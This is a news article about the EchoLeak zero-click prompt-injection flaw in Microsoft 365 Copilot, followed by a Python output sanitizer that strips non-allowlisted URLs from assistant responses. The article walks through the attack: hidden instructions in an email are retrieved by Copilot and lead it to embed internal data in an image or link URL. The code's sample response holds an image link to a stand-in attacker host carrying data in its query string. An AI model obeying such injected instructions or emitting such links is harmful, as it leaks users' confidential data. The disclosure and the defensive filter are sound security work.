San Francisco, June 12: Security researchers have disclosed a major security flaw in the Microsoft 365 Copilot AI agent that could allow attackers to steal users' data via email without any interaction from the user. The flaw, dubbed "EchoLeak" and tracked as CVE-2025-32711, is the first zero-click vulnerability of its kind and let attackers access sensitive data simply by sending emails to their targets. Aim Labs discovered the flaw in January 2025 and then reported it to Microsoft.
In May 2025, the tech giant fixed the EchoLeak vulnerability server-side and confirmed that no customers were impacted. Because the fix was applied on Microsoft's side, users did not need to take any action. Microsoft also said that, although Aim Labs had found the flaw, there was no evidence of attackers using it in real-world attacks.
However, the company acknowledged that it marked a major turning point for AI security. According to reports, EchoLeak is considered the first-ever zero-click vulnerability affecting an LLM (large language model)-based assistant, Microsoft 365 Copilot.
How Did the 'EchoLeak' Vulnerability Work in Microsoft 365 Copilot AI?
The EchoLeak vulnerability could allow an attacker to steal sensitive information from a target (victim) with nothing more than an email. An attacker could send a professional-looking email whose normal-looking text contained hidden prompt instructions designed to confuse the Microsoft 365 Copilot AI assistant. Later, when a Copilot user asked a question related to the same topic, the system would retrieve that earlier email through its RAG (Retrieval-Augmented Generation) engine.
At that point the hidden prompt is activated and directs Copilot to extract internal data and embed it in a link or image without the user's knowledge. The browser automatically accesses the embedded link and sends the user's internal data to the attacker's server. Although Microsoft has fixed EchoLeak, the vulnerability exposed a broader class of threat called "LLM Scope Violations", in which the AI tool is directed to leak data without the user's consent or awareness. Aim Labs marked this flaw as especially dangerous for enterprises with integrated artificial intelligence systems.
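The exfiltration step described above relies on the assistant's answer carrying a link or image reference that the client then fetches, with the stolen data riding along in the URL. One defensive control at the output boundary is to inspect every URL the model emits and refuse to render references to hosts outside the tenant's allowlist, flagging those that carry a query string or long path as a likely exfiltration channel. The following Python is an added illustration of that check; it is not Microsoft's server-side fix nor code from Aim Labs, and the allowlist, the sample response text and the "attacker.invalid" host are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Markdown image/link syntax: ![alt](url) or [text](url); group 1 is the URL.
MARKDOWN_REF = re.compile(r"!?\[[^\]]*\]\(([^)\s]+)\)")
# Bare URLs that appear outside markdown syntax.
BARE_URL = re.compile(r"https?://[^\s)\]>\"']+")

# Assumed tenant allowlist; a real deployment would load this from policy.
ALLOWED_HOSTS = {"contoso.example", "sharepoint.contoso.example"}


def classify_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Return 'allowed', 'suspicious' or 'external' for a URL in model output."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    if host in allowed_hosts:
        return "allowed"
    # An external fetch whose URL carries a query string or a long path has the
    # shape of an exfiltration channel: whatever the model wrote into the URL
    # leaves the tenant the moment the client renders or follows it.
    if parts.query or len(parts.path) > 64:
        return "suspicious"
    return "external"


def sanitize_response(text, allowed_hosts=ALLOWED_HOSTS):
    """Strip every non-allowlisted reference from an assistant response.

    Returns (clean_text, findings) where findings maps each URL seen to its
    verdict, so the caller can log suspicious ones for investigation.
    """
    findings = {}

    def judge(url):
        if url not in findings:
            findings[url] = classify_url(url, allowed_hosts)
        return findings[url]

    def repl_markdown(m):
        return m.group(0) if judge(m.group(1)) == "allowed" else "[external reference removed]"

    def repl_bare(m):
        return m.group(0) if judge(m.group(0)) == "allowed" else "[external reference removed]"

    clean = MARKDOWN_REF.sub(repl_markdown, text)
    clean = BARE_URL.sub(repl_bare, clean)
    return clean, findings


# Constructed sample: what an injected instruction might make the assistant emit.
SAMPLE_RESPONSE = (
    "Summary of the Q3 planning thread.\n\n"
    "![status](https://attacker.invalid/i.png?d=Q3-forecast-14M-acquisition-target)\n\n"
    "Deck: [Q3 deck](https://sharepoint.contoso.example/sites/fin/q3.pptx)\n"
    "Vendor site: https://vendor.example/\n"
)

if __name__ == "__main__":
    clean, findings = sanitize_response(SAMPLE_RESPONSE)
    for url, verdict in findings.items():
        print(f"{verdict:10s} {url}")
    print("---")
    print(clean)
```

The allowlist policy is deliberately strict: anything not on it is removed, and the `suspicious` verdict only adds a signal for the SOC. Rendering clients that auto-fetch images are the reason the image case matters more than a plain link, since no click is needed for the request to leave the tenant.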
(The above story first appeared on LatestLY on Jun 12, 2025 02:03 PM IST.)